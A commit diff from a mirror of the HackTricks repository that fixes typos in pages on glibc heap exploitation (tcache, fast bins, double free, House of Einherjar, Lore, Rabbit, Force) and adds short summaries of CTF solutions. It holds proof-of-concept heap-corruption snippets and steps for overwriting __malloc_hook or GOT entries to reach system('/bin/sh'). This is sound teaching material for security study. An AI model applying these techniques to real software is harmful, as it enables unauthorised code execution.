mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-21 20:23:18 +00:00
commit
b5f7c74d46
15 changed files with 146 additions and 85 deletions
|
@ -29,7 +29,7 @@ Therefore, a tcache is similar to a fast bin per thread in the way that it's a *
|
|||
**When a thread frees** a chunk, **if it isn't too big** to be allocated in the tcache and the respective tcache bin **isn't full** (already 7 chunks), **it'll be allocated in there**. If it cannot go to the tcache, it'll need to wait for the heap lock to be able to perform the free operation globally.
|
||||
|
||||
When a **chunk is allocated**, if there is a free chunk of the needed size in the **Tcache it'll use it**, if not, it'll need to wait for the heap lock to be able to find one in the global bins or create a new one.\
|
||||
There also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so if case it needs more, it'll find them in Tcache.
|
||||
There's also an optimization, in this case, while having the heap lock, the thread **will fill his Tcache with heap chunks (7) of the requested size**, so in case it needs more, it'll find them in Tcache.
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -179,10 +179,10 @@ Additionally, **fast bins use singly linked lists**, not double linked, which fu
|
|||
|
||||
Basically, what happens here is that the header (the pointer to the first chunk to check) is always pointing to the latest freed chunk of that size. So:
|
||||
|
||||
* When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get ana available chunk
|
||||
* When a new chunk is allocated of that size, the header is pointing to a free chunk to use. As this free chunk is pointing to the next one to use, this address is stored in the header so the next allocation knows where to get an available chunk
|
||||
* When a chunk is freed, the free chunk will save the address to the current available chunk and the address to this newly freed chunk will be put in the header
|
||||
|
||||
The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20-0x2f` will be in index `0`, a chunk of size `0x30-0x3f` would bi in `idx` `1`...
|
||||
The maximum size of a linked list is `0x80` and they are organized so a chunk of size `0x20` will be in index `0`, a chunk of size `0x30` would be in index `1`...
|
||||
|
||||
{% hint style="danger" %}
|
||||
Chunks in fast bins aren't set as available so they are keep as fast bin chunks for some time instead of being able to merge with other free chunks surrounding them.
|
||||
|
@ -256,7 +256,7 @@ int main(void)
|
|||
|
||||
Note how we allocate and free 8 chunks of the same size so they fill the tcache and the eight one is stored in the fast chunk.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the fast bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the fast bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -275,7 +275,7 @@ The unsorted bin is a **cache** used by the heap manager to make memory allocati
|
|||
|
||||
When a program **asks for memory**, the heap manager **checks the unsorted bin** to see if there's a chunk of enough size. If it finds one, it uses it right away. If it doesn't find a suitable chunk in the unsorted bin, it moves all the chunks in this list to their corresponding bins, either small or large, based on their size.
|
||||
|
||||
Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be paced back into the unsorted bin. 
|
||||
Note that if a larger chunk is split in 2 halves and the rest is larger than MINSIZE, it'll be paced back into the unsorted bin.
|
||||
|
||||
So, the unsorted bin is a way to speed up memory allocation by quickly reusing recently freed memory and reducing the need for time-consuming searches and merges.
|
||||
|
||||
|
@ -315,9 +315,9 @@ int main(void)
|
|||
}
|
||||
```
|
||||
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eights **don't get merged with the top chunk**.
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the nineth one isn't freed so the nineth and the eighth **don't get merged with the top chunk**.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the unsorted bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. Then with `gef` you can see that the tcache bin is full and one chunk is in the unsorted bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -408,7 +408,7 @@ int main(void)
|
|||
|
||||
Note how we allocate and free 9 chunks of the same size so they **fill the tcache** and the eight one is stored in the unsorted bin because it's **too big for the fastbin** and the ninth one isn't freed so the ninth and the eights **don't get merged with the top chunk**. Then we allocate a bigger chunk of 0x110 which makes **the chunk in the unsorted bin goes to the small bin**.
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the small bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the small bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bins
|
||||
|
@ -447,7 +447,7 @@ There are:
|
|||
* 8bins of 4096B range (part collide with small bins)
|
||||
* 4bins of 32768B range
|
||||
* 2bins of 262144B range
|
||||
* 1bin for reminding sizes
|
||||
* 1bin for remaining sizes
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -514,7 +514,7 @@ int main(void)
|
|||
|
||||
2 large allocations are performed, then on is freed (putting it in the unsorted bin) and a bigger allocation in made (moving the free one from the usorted bin ro the large bin).
|
||||
|
||||
Compile it and debug it with a breakpoint in the ret opcode from main function. then with gef you can see the tcache bin fill and the one chunk in the large bin:
|
||||
Compile it and debug it with a breakpoint in the `ret` opcode from `main` function. then with `gef` you can see that the tcache bin is full and one chunk is in the large bin:
|
||||
|
||||
```bash
|
||||
gef➤ heap bin
|
||||
|
@ -590,7 +590,7 @@ int main(void)
|
|||
}
|
||||
```
|
||||
|
||||
After compiling and debugging it with a break point in the ret opcode of main I saw that the malloc returned the address: `0xaaaaaaac12a0` and these are the chunk:
|
||||
After compiling and debugging it with a break point in the `ret` opcode of `main` I saw that the malloc returned the address `0xaaaaaaac12a0` and these are the chunks:
|
||||
|
||||
```bash
|
||||
gef➤ heap chunks
|
||||
|
@ -605,7 +605,7 @@ Chunk(addr=0xaaaaaaac16d0, size=0x410, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_
|
|||
Chunk(addr=0xaaaaaaac1ae0, size=0x20530, flags=PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA) ← top chunk
|
||||
```
|
||||
|
||||
Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. This is no surprise because the lates allocated chunk was in `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` .\
|
||||
Where it can be seen that the top chunk is at address `0xaaaaaaac1ae0`. This is no surprise because the last allocated chunk was in `0xaaaaaaac12a0` with a size of `0x410` and `0xaaaaaaac12a0 + 0x410 = 0xaaaaaaac1ae0` .\
|
||||
It's also possible to see the length of the Top chunk on its chunk header:
|
||||
|
||||
```bash
|
||||
|
@ -616,9 +616,9 @@ gef➤ x/8wx 0xaaaaaaac1ae0 - 16
|
|||
|
||||
</details>
|
||||
|
||||
### Last Reminder
|
||||
### Last Remainder
|
||||
|
||||
When malloc is used and a chunk is divided (from the unlinked list or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Reminder and it's pointer is stored in the `malloc_state` struct.
|
||||
When malloc is used and a chunk is divided (from the unsorted bin or from the top chunk for example), the chunk created from the rest of the divided chunk is called Last Remainder and it's pointer is stored in the `malloc_state` struct.
|
||||
|
||||
## Allocation Flow
|
||||
|
||||
|
|
|
@ -16,7 +16,7 @@ Other ways to support HackTricks:
|
|||
|
||||
## Basic Information
|
||||
|
||||
If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fastbin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption.
|
||||
If you free a block of memory more than once, it can mess up the allocator's data and open the door to attacks. Here's how it happens: when you free a block of memory, it goes back into a list of free chunks (e.g. the "fast bin"). If you free the same block twice in a row, the allocator detects this and throws an error. But if you **free another chunk in between, the double-free check is bypassed**, causing corruption.
|
||||
|
||||
Now, when you ask for new memory (using `malloc`), the allocator might give you a **block that's been freed twice**. This can lead to two different pointers pointing to the same memory location. If an attacker controls one of those pointers, they can change the contents of that memory, which can cause security issues or even allow them to execute code.
|
||||
|
||||
|
@ -94,7 +94,7 @@ int main() {
|
|||
}
|
||||
```
|
||||
|
||||
In this example, after filling the tcache with several freed chunks, the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double-free error**. This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation.
|
||||
In this example, after filling the tcache with several freed chunks (7), the code **frees chunk `h`, then chunk `i`, and then `h` again, causing a double free** (also known as Fast Bin dup). This opens the possibility of receiving overlapping memory addresses when reallocating, meaning two or more pointers can point to the same memory location. Manipulating data through one pointer can then affect the other, creating a critical security risk and potential for exploitation.
|
||||
|
||||
Executing it, note how **`i1` and `i2` got the same address**:
|
||||
|
||||
|
@ -121,6 +121,22 @@ h1: 0xaaab0f0c2380
|
|||
</strong><strong>i2: 0xaaab0f0c23a0
|
||||
</strong></code></pre>
|
||||
|
||||
## Examples
|
||||
|
||||
* [**Dragon Army. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/dragon-army/)
|
||||
* We can only allocate Fast-Bin-sized chunks except for size `0x70`, which prevents the usual `__malloc_hook` overwrite.
|
||||
* Instead, we use PIE addresses that start with `0x56` as a target for Fast Bin dup (1/2 chance).
|
||||
* One place where PIE addresses are stored is in `main_arena`, which is inside Glibc and near `__malloc_hook`
|
||||
* We target a specific offset of `main_arena` to allocate a chunk there and continue allocating chunks until reaching `__malloc_hook` to get code execution.
|
||||
* [**zero_to_hero. PicoCTF**](https://7rocky.github.io/en/ctf/picoctf/binary-exploitation/zero_to_hero/)
|
||||
* Using Tcache bins and a null-byte overflow, we can achieve a double-free situation:
|
||||
* We allocate three chunks of size `0x110` (`A`, `B`, `C`)
|
||||
* We free `B`
|
||||
* We free `A` and allocate again to use the null-byte overflow
|
||||
* Now `B`'s size field is `0x100`, instead of `0x111`, so we can free it again
|
||||
* We have one Tcache-bin of size `0x110` and one of size `0x100` that point to the same address. So we have a double free.
|
||||
* We leverage the double free using [Tcache poisoning](tcache-bin-attack.md)
|
||||
|
||||
## References
|
||||
|
||||
* [https://heap-exploitation.dhavalkapil.com/attacks/double\_free](https://heap-exploitation.dhavalkapil.com/attacks/double\_free)
|
||||
|
|
|
@ -22,7 +22,7 @@ For more information about what is a fast bin check this page:
|
|||
[bins-and-memory-allocations.md](bins-and-memory-allocations.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
Because the fast bin is single linked, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.
|
||||
Because the fast bin is a singly linked list, there are much less protections than in other bins and just **modifying an address in a freed fast bin** chunk is enough to be able to **allocate later a chunk in any memory address**.
|
||||
|
||||
As summary:
|
||||
|
||||
|
@ -136,26 +136,30 @@ int main(void)
|
|||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows to generate fast bin of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously.
|
||||
If it's possible to overwrite the value of the global variable **`global_max_fast`** with a big number, this allows to generate fast bin chunks of bigger sizes, potentially allowing to perform fast bin attacks in scenarios where it wasn't possible previously. This situation useful in the context of [large bin attack](large-bin-attack.md) and [unsorted bin attack](unsorted-bin-attack.md)
|
||||
{% endhint %}
|
||||
|
||||
## Examples
|
||||
|
||||
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/0ctf\_babyheap/index.html)**:**
|
||||
* It's possible to alloc chunks, free then, read their contents and fill them (with an overflow vulnerability).
|
||||
* **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to crate a fake prev\_size so one previous chunks is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print it's data an leak an address to libc (main\_arena+88).
|
||||
* **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that was pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before malloc\_hook (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive an address to malloc hooks.\
|
||||
* It's possible to allocate chunks, free them, read their contents and fill them (with an overflow vulnerability).
|
||||
* **Consolidate chunk for infoleak**: The technique is basically to abuse the overflow to create a fake `prev_size` so one previous chunks is put inside a bigger one, so when allocating the bigger one containing another chunk, it's possible to print it's data an leak an address to libc (`main_arena+88`).
|
||||
* **Overwrite malloc hook**: For this, and abusing the previous overlapping situation, it was possible to have 2 chunks that were pointing to the same memory. Therefore, freeing them both (freeing another chunk in between to avoid protections) it was possible to have the same chunk in the fast bin 2 times. Then, it was possible to allocate it again, overwrite the address to the next chunk to point a bit before `__malloc_hook` (so it points to an integer that malloc thinks is a free size - another bypass), allocate it again and then allocate another chunk that will receive an address to malloc hooks.\
|
||||
Finally a **one gadget** was written in there.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html**](https://guyinatuxedo.github.io/28-fastbin\_attack/csaw17\_auir/index.html)**:**
|
||||
* There is a heap overflow and user after free and double free because when a chunk is freed it's possible to reuse and re-free the pointers
|
||||
* There is a heap overflow and use after free and double free because when a chunk is freed it's possible to reuse and re-free the pointers
|
||||
* **Libc info leak**: Just free some chunks and they will get a pointer to a part of the main arena location. As you can reuse freed pointers, just read this address.
|
||||
* **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite this allocation pointers to point to the got address of `free` to point to system and then write chunk 1 `"/bin/sh"` to then `free(chunk1)` which will execute `system("/bin/sh")`.
|
||||
* **Fast bin attack**: All the pointers to the allocations are stored inside an array, so we can free a couple of fast bin chunks and in the last one overwrite the address to point a bit before this array of pointers. Then, allocate a couple of chunks with the same size and we will get first the legit one and then the fake one containing the array of pointers. We can now overwrite this allocation pointers to make the GOT address of `free` point to `system` and then write `"/bin/sh"` in chunk 1 to then call `free(chunk1)` which instead will execute `system("/bin/sh")`.
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw19\_traveller/index.html)
|
||||
* Another example of abusing a 1B overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* Another example of abusing a one byte overflow to consolidate chunks in the unsorted bin and get a libc infoleak and then perform a fast bin attack to overwrite malloc hook with a one gadget address
|
||||
* **CTF** [**https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html**](https://guyinatuxedo.github.io/33-custom\_misc\_heap/csaw18\_alienVSsamurai/index.html)
|
||||
* After an infoleak abusing the unsorted bin with a UAF to leak a libc address and a PIE address, the exploit of this CTF used a fast bin attack to allocate a chunk in a place where the pointers to controlled chunks were located so it was possible to overwrite certain pointers to write a one gadget in the GOT
|
||||
* You can find a Fast Bin attack abused through an unsorted bin attack:
|
||||
* Note that it's common before performing fast bin attacks to abuse the unliked list to leak libc/heap addresses (when needed).
|
||||
* Note that it's common before performing fast bin attacks to abuse the free-lists to leak libc/heap addresses (when needed).
|
||||
* [**Robot Factory. BlackHat MEA CTF 2022**](https://7rocky.github.io/en/ctf/other/blackhat-ctf/robot-factory/)
|
||||
* We can only allocate chunks of size greater than `0x100`.
|
||||
* Overwrite `global_max_fast` using an Unsorted Bin attack (works 1/16 times due to ASLR, because we need to modify 12 bits, but we must modify 16 bits).
|
||||
* Fast Bin attack to modify the a global array of chunks. This gives an arbitrary read/write primitive, which allows to modify the GOT and set some function to point to `system`.
|
||||
|
||||
{% content-ref url="unsorted-bin-attack.md" %}
|
||||
[unsorted-bin-attack.md](unsorted-bin-attack.md)
|
||||
|
|
|
@ -21,14 +21,14 @@ A heap overflow is like a [**stack overflow**](../stack-overflow/) but in the he
|
|||
In stack overflows we know that some registers like the instruction pointer or the stack frame are going to be restored from the stack and it could be possible to abuse this. In case of heap overflows, there **isn't any sensitive information stored by default** in the heap chunk that can be overflowed. However, it could be sensitive information or pointers, so the **criticality** of this vulnerability **depends** on **which data could be overwritten** and how an attacker could abuse this.
|
||||
|
||||
{% hint style="success" %}
|
||||
In order to find overflow offsets you can use the same patters as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||
In order to find overflow offsets you can use the same patterns as in [**stack overflows**](../stack-overflow/#finding-stack-overflows-offsets).
|
||||
{% endhint %}
|
||||
|
||||
### Stack Overflows vs Heap Overflows
|
||||
|
||||
In stack overflows the arranging and data that is going to be present in the stack at the moment the vulnerability can be triggered is fairly reliable. This is because the stack is linear, always increasing in colliding memory, in **specific places of the program run the stack memory usually stores similar kind of data** and it has some specific structure with some pointers at the end of the stack part used by each function.
|
||||
|
||||
However, in the case of a heap overflow, because the used memory isn’t linear but **allocated chunks of are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed.
|
||||
However, in the case of a heap overflow, the used memory isn’t linear but **allocated chunks are usually in separated positions of memory** (not one next to the other) because of **bins and zones** separating allocations by size and because **previous freed memory is used** before allocating new chunks. It’s **complicated to know the object that is going to be colliding with the one vulnerable** to a heap overflow. So, when a heap overflow is found, it’s needed to find a **reliable way to make the desired object to be next in memory** from the one that can be overflowed.
|
||||
|
||||
One of the techniques used for this is **Heap Grooming** which is used for example [**in this post**](https://azeria-labs.com/grooming-the-ios-kernel-heap/). In the post it’s explained how when in iOS kernel when a zone run out of memory to store chunks of memory, it expands it by a kernel page, and this page is splitted into chunks of the expected sizes which would be used in order (until iOS version 9.2, then these chunks are used in a randomised way to difficult the exploitation of these attacks).
|
||||
|
||||
|
@ -54,6 +54,12 @@ In the page [https://8ksec.io/arm64-reversing-and-exploitation-part-1-arm-instru
|
|||
python3 -c 'print("/"*0x400+"/bin/ls\x00")' > hax.txt
|
||||
```
|
||||
|
||||
### Other examples
|
||||
|
||||
* [**Auth-or-out. Hack The Box**](https://7rocky.github.io/en/ctf/htb-challenges/pwn/auth-or-out/)
|
||||
* We use an Integer Overflow vulnerability to get a Heap Overflow.
|
||||
* We corrupt pointers to a function inside a `struct` of the overflowed chunk to set a function such as `system` and get code execution.
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
|
|
@ -29,8 +29,8 @@ Other ways to support HackTricks:
|
|||
|
||||
* Create a fake chunk when we want to allocate a chunk:
|
||||
* Set pointers to point to itself to bypass sanity checks
|
||||
* Off by one over from one chunk to another to modify the prev in use
|
||||
* Indicate in the `prev_size` of the off-by-one abused chunk the difference between itself and the fake chunk
|
||||
* One-byte overflow with a null byte from one chunk to the next one to modify the `PREV_INUSE` flag.
|
||||
* Indicate in the `prev_size` of the off-by-null abused chunk the difference between itself and the fake chunk
|
||||
* The fake chunk size must also have been set the same size to bypass sanity checks
|
||||
* For constructing these chunks, you will need a heap leak.
|
||||
|
||||
|
@ -44,17 +44,19 @@ Other ways to support HackTricks:
|
|||
* Then, `C` is freed so it consolidates with the fake chunk `A`
|
||||
* Then, a new chunk `D` is created which will be starting in the fake `A` chunk and covering `B` chunk
|
||||
* The house of Einherjar finishes here
|
||||
* This can be continued with a fast bin attack:
|
||||
* Free `B` to add it to the fast bin
|
||||
* This can be continued with a fast bin attack or Tcache poisoning:
|
||||
* Free `B` to add it to the fast bin / Tcache
|
||||
* `B`'s `fd` is overwritten making it point to the target address abusing the `D` chunk (as it contains `B` inside) 
|
||||
* Then, 2 mallocs are done and the second one is going to be **allocating the target address**
|
||||
|
||||
## References and other examples
|
||||
|
||||
* [https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.35/house\_of\_einherjar.c)
|
||||
* [https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad)
|
||||
* **CTF** [**https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad**](https://ctf-wiki.mahaloz.re/pwn/linux/glibc-heap/house\_of\_einherjar/#2016-seccon-tinypad)
|
||||
* After freeing pointers their aren't nullified, so it's still possible to access their data. Therefore a chunk is placed in the unsorted bin and leaked the pointers it contains (libc leak) and then a new heap is places on the unsorted bin and leaked a heap address from the pointer it gets.
|
||||
*
|
||||
* [**baby-talk. DiceCTF 2024**](https://7rocky.github.io/en/ctf/other/dicectf/baby-talk/)
|
||||
* Null-byte overflow bug in `strtok`.
|
||||
* Use House of Einherjar to get an overlapping chunks situation and finish with Tcache poisoning ti get an arbitrary write primitive.
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -51,8 +51,8 @@ Then, calculate the distance between the address of the top chunk and the target
|
|||
*/
|
||||
```
|
||||
|
||||
Therefore, allocing a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when alloced) will move the top chunk to the address we want to overwrite.\
|
||||
Then, do another malloc to get a chunk containing the at the beginning of the data to write the target address.
|
||||
Therefore, allocating a size of `target - old_top - 4*sizeof(long)` (the 4 longs are because of the metadata of the top chunk and of the new chunk when allocated) will move the top chunk to the address we want to overwrite.\
|
||||
Then, do another malloc to get a chunk at the target address.
|
||||
|
||||
### References & Other Examples
|
||||
|
||||
|
|
|
@ -22,33 +22,33 @@ Other ways to support HackTricks:
|
|||
* This isn't working
|
||||
* Or: [https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c](https://github.com/shellphish/how2heap/blob/master/glibc\_2.39/house\_of\_lore.c)
|
||||
* This isn't working even if it tries to bypass some checks getting the error: `malloc(): unaligned tcache chunk detected`
|
||||
* This example is still working**:** [**https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html**](https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html) 
|
||||
* This example is still working: [**https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html**](https://guyinatuxedo.github.io/40-house\_of\_lore/house\_lore\_exp/index.html) 
|
||||
|
||||
### Goal
|
||||
|
||||
* Insert a **fake small chunk in the small bin so then it's possible to allocate it**.\
|
||||
Note that the small chunk added is the fake one the attacker creates a not a fake one in a arbitrary position.
|
||||
Note that the small chunk added is the fake one the attacker creates and not a fake one in an arbitrary position.
|
||||
|
||||
### Requirements
|
||||
|
||||
* Create 2 fake chunks and link them with them and with the legit chunk in the small bin:
|
||||
* Create 2 fake chunks and link them together and with the legit chunk in the small bin:
|
||||
* `fake0.bk` -> `fake1`
|
||||
* `fake1.fd` -> `fake0`
|
||||
* `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
|
||||
* `legit.bk` -> `fake0`
|
||||
|
||||
The you will be able to allocate `fake0`.
|
||||
Then you will be able to allocate `fake0`.
|
||||
|
||||
### Attack
|
||||
|
||||
* A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with top chunk. Then, legit is freed (moving it to the unsorted list) and the a larger chunk is allocated, **moving `legit` it to the small bin.**
|
||||
* An attacker generates a couple of fake small chunks, and makes the need linking to bypass sanity checks:
|
||||
* A small chunk (`legit`) is allocated, then another one is allocated to prevent consolidating with top chunk. Then, `legit` is freed (moving it to the unsorted bin list) and the a larger chunk is allocated, **moving `legit` it to the small bin.**
|
||||
* An attacker generates a couple of fake small chunks, and makes the needed linking to bypass sanity checks:
|
||||
* `fake0.bk` -> `fake1`
|
||||
* `fake1.fd` -> `fake0`
|
||||
* `fake0.fd` -> `legit` (you need to modify a pointer in the freed small bin chunk via some other vuln)
|
||||
* `legit.bk` -> `fake0`
|
||||
* A small chunk is allocated to get legit, making **`fake0`** into the top list of small bins
|
||||
* Another small chunk is allocated, getting fake0 as a chunk, allowing potentially to read/write pointers inside of it.
|
||||
* Another small chunk is allocated, getting `fake0` as a chunk, allowing potentially to read/write pointers inside of it.
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -16,17 +16,17 @@ Other ways to support HackTricks:
|
|||
|
||||
### Requirements
|
||||
|
||||
1. **Ability to Modify Fastbin fd Pointer or Size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
|
||||
2. **Ability to Trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
|
||||
1. **Ability to modify fast bin fd pointer or size**: This means you can change the forward pointer of a chunk in the fastbin or its size.
|
||||
2. **Ability to trigger `malloc_consolidate`**: This can be done by either allocating a large chunk or merging the top chunk, which forces the heap to consolidate chunks.
|
||||
|
||||
### Goals
|
||||
|
||||
1. **Create Overlapping Chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
|
||||
2. **Forge Fake Chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
|
||||
1. **Create overlapping chunks**: To have one chunk overlap with another, allowing for further heap manipulations.
|
||||
2. **Forge fake chunks**: To trick the allocator into treating a fake chunk as a legitimate chunk during heap operations.
|
||||
|
||||
## Steps of the Attack
|
||||
## Steps of the attack
|
||||
|
||||
### POC 1: Modify the Size of a Fastbin Chunk
|
||||
### POC 1: Modify the size of a fast bin chunk
|
||||
|
||||
**Objective**: Create an overlapping chunk by manipulating the size of a fastbin chunk.
|
||||
|
||||
|
@ -38,7 +38,7 @@ unsigned long* chunk2 = malloc(0x40); // Allocates another chunk of 0x40 bytes
|
|||
malloc(0x10); // Allocates a small chunk to change the fastbin state
|
||||
```
|
||||
|
||||
We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fastbin list once freed.
|
||||
We allocate two chunks of 0x40 bytes each. These chunks will be placed in the fast bin list once freed.
|
||||
|
||||
* **Step 2: Free Chunks**
|
||||
|
||||
|
@ -63,13 +63,13 @@ We change the size metadata of `chunk1` to 0xa1. This is a crucial step to trick
|
|||
malloc(0x1000); // Allocate a large chunk to trigger heap consolidation
|
||||
```
|
||||
|
||||
Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fastbin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
|
||||
Allocating a large chunk triggers the `malloc_consolidate` function, merging small chunks in the fast bin. The manipulated size of `chunk1` causes it to overlap with `chunk2`.
|
||||
|
||||
After consolidation, `chunk1` overlaps with `chunk2`, allowing for further exploitation.
|
||||
|
||||
### POC 2: Modify the FD Pointer
|
||||
### POC 2: Modify the `fd` pointer
|
||||
|
||||
**Objective**: Create a fake chunk by manipulating the fastbin fd pointer.
|
||||
**Objective**: Create a fake chunk by manipulating the fast bin `fd` pointer.
|
||||
|
||||
* **Step 1: Allocate Chunks**
|
||||
|
||||
|
@ -80,7 +80,7 @@ unsigned long* chunk2 = malloc(0x100); // Allocates a chunk of 0x100 bytes at 0x
|
|||
|
||||
**Explanation**: We allocate two chunks, one smaller and one larger, to set up the heap for the fake chunk.
|
||||
|
||||
* **Step 2: Create Fake Chunk**
|
||||
* **Step 2: Create fake chunk**
|
||||
|
||||
```cpp
|
||||
chunk2[1] = 0x31; // Fake chunk size 0x30
|
||||
|
@ -90,7 +90,7 @@ chunk2[11] = 0x21; // Next-next fake chunk
|
|||
|
||||
We write fake chunk metadata into `chunk2` to simulate smaller chunks.
|
||||
|
||||
* **Step 3: Free Chunk1**
|
||||
* **Step 3: Free `chunk1`**
|
||||
|
||||
```cpp
|
||||
free(chunk1); // Frees the chunk at 0x602000
|
||||
|
@ -98,13 +98,13 @@ free(chunk1); // Frees the chunk at 0x602000
|
|||
|
||||
**Explanation**: We free `chunk1`, adding it to the fastbin list.
|
||||
|
||||
* **Step 4: Modify FD of Chunk1**
|
||||
* **Step 4: Modify `fd` of `chunk1`**
|
||||
|
||||
```cpp
|
||||
chunk1[0] = 0x602060; // Modify the fd of chunk1 to point to the fake chunk within chunk2
|
||||
```
|
||||
|
||||
**Explanation**: We change the forward pointer (fd) of `chunk1` to point to our fake chunk inside `chunk2`.
|
||||
**Explanation**: We change the forward pointer (`fd`) of `chunk1` to point to our fake chunk inside `chunk2`.
|
||||
|
||||
* **Step 5: Trigger `malloc_consolidate`**
|
||||
|
||||
|
@ -118,7 +118,7 @@ The fake chunk becomes part of the fastbin list, making it a legitimate chunk fo
|
|||
|
||||
### Summary
|
||||
|
||||
The **House of Rabbit** technique involves either modifying the size of a fastbin chunk to create overlapping chunks or manipulating the fd pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
|
||||
The **House of Rabbit** technique involves either modifying the size of a fast bin chunk to create overlapping chunks or manipulating the `fd` pointer to create fake chunks. This allows attackers to forge legitimate chunks in the heap, enabling various forms of exploitation. Understanding and practicing these steps will enhance your heap exploitation skills.
|
||||
|
||||
<details>
|
||||
|
